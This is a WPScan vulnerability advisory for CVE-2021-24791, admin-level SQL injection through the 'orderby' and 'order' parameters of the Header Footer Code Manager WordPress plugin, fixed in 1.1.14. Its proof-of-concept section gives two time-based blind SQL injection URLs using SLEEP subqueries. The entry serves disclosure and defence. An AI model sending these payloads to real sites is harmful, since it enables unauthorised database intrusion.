WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Header Footer Code Manager < 1.1.14 - Admin+ SQL Injections

Description

The plugin does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections

Proof of Concept

https://example.com/wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%2810%29%29%29uWCv%29&order=DESC

https://example.com/wp-admin/admin.php?page=hfcm-list&orderby=name&order=+AND+%28SELECT+9933+FROM+%28SELECT%28SLEEP%2810%29%29%29wbfm%29

Affects Plugins

header-footer-code-manager
Fixed in version 1.1.14

References

CVE
CVE-2021-24791

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

bl4derunner

Submitter

Anton Sarsadskikh

Verified

Yes

WPVDB ID
d55caa9b-d50f-4c13-bc69-dc475641735f

Timeline

Publicly Published

2021-10-11 (about 8 months ago)

Added

2021-10-11 (about 8 months ago)

Last Updated

2022-04-08 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin